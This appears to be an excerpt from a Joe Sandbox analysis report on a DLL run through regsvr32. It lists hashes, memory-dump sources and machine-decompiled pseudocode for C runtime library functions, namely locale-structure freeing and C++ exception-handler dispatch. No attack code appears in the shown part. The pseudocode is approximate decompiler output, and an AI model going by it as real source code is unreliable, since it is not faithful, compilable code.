Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1710 Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E1710() {

				return  *[fs:0x30];
			}

0x6e9e171a

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F0367 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9F0367(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e9fc708) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E9EDC0E(_t46);
							E6E9F180D( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E9EDC0E(_t47);
							E6E9F190B( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E9EDC0E( *((intOrPtr*)(_t74 + 0x7c)));
						E6E9EDC0E( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E9F04D8( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e9fc1d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E9EDC0E(_t31);
							E6E9EDC0E( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E9EDC0E(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E9EDC0E(_t74);
			}

0x6e9f036f
0x6e9f0373
0x6e9f037b
0x6e9f0384
0x6e9f0389
0x6e9f0390
0x6e9f0398
0x6e9f03a0
0x6e9f03ab
0x6e9f03b1
0x6e9f03b2
0x6e9f03ba
0x6e9f03c2
0x6e9f03cd
0x6e9f03d3
0x6e9f03d7
0x6e9f03e2
0x6e9f03e8
0x6e9f0389
0x6e9f03e9
0x6e9f03f1
0x6e9f0404
0x6e9f0417
0x6e9f0425
0x6e9f0430
0x6e9f0435
0x6e9f043e
0x6e9f0446
0x6e9f0447
0x6e9f044d
0x6e9f0450
0x6e9f0453
0x6e9f045a
0x6e9f045c
0x6e9f0460
0x6e9f0468
0x6e9f046f
0x6e9f0475
0x6e9f0476
0x6e9f0476
0x6e9f047d
0x6e9f047f
0x6e9f0484
0x6e9f048c
0x6e9f0491
0x6e9f0492
0x6e9f0492
0x6e9f0495
0x6e9f0498
0x6e9f049b
0x6e9f049e
0x6e9f049e
0x6e9f04ae

APIs

___free_lconv_mon.LIBCMT ref: 6E9F03AB

Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F182A
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F183C
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F184E
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1860
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1872
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1884
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1896
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18A8
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18BA
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18CC
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18DE
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18F0
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1902

_free.LIBCMT ref: 6E9F03A0

Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9F03C2
_free.LIBCMT ref: 6E9F03D7
_free.LIBCMT ref: 6E9F03E2
_free.LIBCMT ref: 6E9F0404
_free.LIBCMT ref: 6E9F0417
_free.LIBCMT ref: 6E9F0425
_free.LIBCMT ref: 6E9F0430
_free.LIBCMT ref: 6E9F0468
_free.LIBCMT ref: 6E9F046F
_free.LIBCMT ref: 6E9F048C
_free.LIBCMT ref: 6E9F04A4

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: c9572019c7da83003c4341cf507d30882606d842be21c85db24bb7a59c903297
Instruction ID: c2eb77726e84319933727047bb88f346897cfff9220fe5817232d387ecb4e4f7
Opcode Fuzzy Hash: c9572019c7da83003c4341cf507d30882606d842be21c85db24bb7a59c903297
Instruction Fuzzy Hash: 24318E71604305DFEB629AF9D941B8E73EDAF80354F10892AE565D7650EFB0E881CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EB0CB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E9EB0CB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6E9EC03D(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6E9ED547(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6E9EAD86(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6E9EAD86(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6E9EA645(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6E9EA578(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E9EB04B(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6E9ED547(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6E9EAD86(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6E9EAD86(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6E9EAD86(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6E9EA578(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6E9EB04B(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E9EAB2E(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6E9EBADA(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6E9EBADA(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6E9ED3B8(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6E9EB76E( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6e9fc920) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6E9EAB2E(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6E9EB756( &_v64);
											E6E9EA50C( &_v64, 0x6e9fa7ac);
											L63:
											 *(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6E9EA76B(_t279, _t319, _t274);
											E6E9EB9DA(_a8, _a16, _t305);
											_t235 = E6E9EBB97(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6E9EB951(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6e9eb0cb
0x6e9eb0d2
0x6e9eb0d4
0x6e9eb0dd
0x6e9eb0e3
0x6e9eb0eb
0x6e9eb0ed
0x6e9eb0f0
0x6e9eb0f6
0x6e9eb46f
0x6e9eb46f
0x6e9eb474
0x6e9eb476
0x6e9eb478
0x6e9eb47b
0x6e9eb47c
0x6e9eb47f
0x6e9eb485
0x6e9eb5a4
0x6e9eb48b
0x6e9eb48b
0x6e9eb48c
0x6e9eb48d
0x6e9eb494
0x6e9eb497
0x6e9eb49a
0x6e9eb4a0
0x6e9eb4a2
0x6e9eb4a7
0x6e9eb4aa
0x6e9eb4ac
0x6e9eb4b2
0x6e9eb4b4
0x6e9eb4ba
0x6e9eb4cf
0x6e9eb4d4
0x6e9eb4d7
0x6e9eb4d9
0x6e9eb5a0
0x00000000
0x6e9eb5a1
0x6e9eb4d9
0x6e9eb4ba
0x6e9eb4b2
0x6e9eb4aa
0x6e9eb4df
0x6e9eb4e2
0x6e9eb4e5
0x6e9eb4e8
0x6e9eb4eb
0x6e9eb4f1
0x6e9eb503
0x6e9eb508
0x6e9eb50b
0x6e9eb50e
0x6e9eb511
0x6e9eb514
0x6e9eb517
0x6e9eb51a
0x00000000
0x00000000
0x6e9eb520
0x6e9eb520
0x6e9eb523
0x6e9eb526
0x6e9eb535
0x6e9eb536
0x6e9eb536
0x6e9eb538
0x6e9eb53b
0x00000000
0x00000000
0x6e9eb53d
0x6e9eb540
0x00000000
0x00000000
0x6e9eb54e
0x6e9eb550
0x6e9eb553
0x6e9eb555
0x6e9eb55d
0x6e9eb55d
0x6e9eb560
0x6e9eb562
0x6e9eb564
0x6e9eb580
0x6e9eb585
0x6e9eb588
0x6e9eb588
0x00000000
0x6e9eb560
0x6e9eb557
0x6e9eb55b
0x00000000
0x00000000
0x00000000
0x6e9eb58b
0x6e9eb58e
0x6e9eb58f
0x6e9eb592
0x6e9eb595
0x6e9eb598
0x6e9eb59b
0x6e9eb59b
0x00000000
0x6e9eb526
0x6e9eb5a5
0x6e9eb5aa
0x6e9eb5ab
0x6e9eb5ae
0x6e9eb5b1
0x6e9eb5b2
0x6e9eb5b3
0x6e9eb5b4
0x6e9eb5b7
0x6e9eb5b9
0x6e9eb631
0x6e9eb633
0x6e9eb633
0x6e9eb5bb
0x6e9eb5bb
0x6e9eb5be
0x6e9eb5c1
0x00000000
0x6e9eb5c3
0x6e9eb5c3
0x6e9eb5c6
0x6e9eb5c9
0x6e9eb5d0
0x6e9eb5d0
0x6e9eb5d3
0x6e9eb5d5
0x6e9eb5d7
0x6e9eb609
0x6e9eb609
0x6e9eb60c
0x6e9eb613
0x6e9eb613
0x6e9eb616
0x6e9eb619
0x6e9eb620
0x6e9eb620
0x6e9eb623
0x6e9eb62a
0x6e9eb62c
0x6e9eb62c
0x6e9eb625
0x6e9eb625
0x6e9eb628
0x00000000
0x00000000
0x6e9eb628
0x6e9eb61b
0x6e9eb61b
0x6e9eb61e
0x00000000
0x00000000
0x6e9eb61e
0x6e9eb60e
0x6e9eb60e
0x6e9eb611
0x00000000
0x00000000
0x6e9eb611
0x6e9eb62d
0x6e9eb5d9
0x6e9eb5d9
0x6e9eb5d9
0x6e9eb5dc
0x6e9eb5dc
0x6e9eb5de
0x6e9eb5e0
0x00000000
0x00000000
0x6e9eb5e2
0x6e9eb5e4
0x6e9eb5f8
0x6e9eb5f8
0x6e9eb5e6
0x6e9eb5e6
0x6e9eb5e9
0x6e9eb5ec
0x00000000
0x6e9eb5ee
0x6e9eb5ee
0x6e9eb5f1
0x6e9eb5f4
0x6e9eb5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb5f6
0x6e9eb5ec
0x6e9eb601
0x6e9eb601
0x6e9eb603
0x00000000
0x6e9eb605
0x6e9eb605
0x6e9eb605
0x00000000
0x6e9eb603
0x6e9eb5fc
0x6e9eb5fe
0x6e9eb5fe
0x00000000
0x6e9eb5fe
0x6e9eb5cb
0x6e9eb5cb
0x6e9eb5ce
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb5ce
0x6e9eb5c9
0x6e9eb5c1
0x6e9eb634
0x6e9eb638
0x6e9eb638
0x6e9eb105
0x6e9eb105
0x6e9eb10e
0x6e9eb20b
0x6e9eb20b
0x6e9eb20e
0x00000000
0x6e9eb13d
0x6e9eb13d
0x6e9eb142
0x00000000
0x6e9eb148
0x6e9eb148
0x6e9eb150
0x6e9eb409
0x6e9eb40d
0x6e9eb156
0x6e9eb15b
0x6e9eb15e
0x6e9eb163
0x6e9eb16a
0x6e9eb16f
0x00000000
0x6e9eb1a7
0x6e9eb1af
0x6e9eb213
0x6e9eb213
0x6e9eb216
0x6e9eb219
0x6e9eb21b
0x6e9eb21e
0x6e9eb221
0x6e9eb227
0x6e9eb3d8
0x6e9eb3d8
0x6e9eb3db
0x00000000
0x6e9eb3dd
0x6e9eb3dd
0x6e9eb3e0
0x00000000
0x6e9eb3e6
0x6e9eb3e6
0x6e9eb3e9
0x6e9eb3ec
0x6e9eb3ed
0x6e9eb3ee
0x6e9eb3f1
0x6e9eb3f2
0x6e9eb3f5
0x6e9eb3f6
0x6e9eb3fb
0x00000000
0x6e9eb3fb
0x6e9eb3e0
0x6e9eb22d
0x6e9eb22d
0x6e9eb231
0x00000000
0x6e9eb237
0x6e9eb237
0x6e9eb23e
0x6e9eb256
0x6e9eb256
0x6e9eb259
0x6e9eb25c
0x6e9eb262
0x6e9eb272
0x6e9eb277
0x6e9eb27a
0x6e9eb27d
0x6e9eb280
0x6e9eb283
0x6e9eb286
0x6e9eb289
0x6e9eb28f
0x6e9eb28f
0x6e9eb292
0x6e9eb295
0x6e9eb2a4
0x6e9eb2a5
0x6e9eb2a5
0x6e9eb2a7
0x6e9eb2aa
0x6e9eb2b0
0x6e9eb2b3
0x6e9eb2b9
0x6e9eb2bb
0x6e9eb2be
0x6e9eb2c1
0x6e9eb2ca
0x6e9eb2cd
0x6e9eb2cf
0x6e9eb2cf
0x6e9eb2d2
0x6e9eb2d5
0x6e9eb2d8
0x6e9eb2db
0x6e9eb2de
0x6e9eb2e3
0x6e9eb2e4
0x6e9eb2e5
0x6e9eb2e6
0x6e9eb2e7
0x6e9eb2ea
0x6e9eb2ec
0x6e9eb2ee
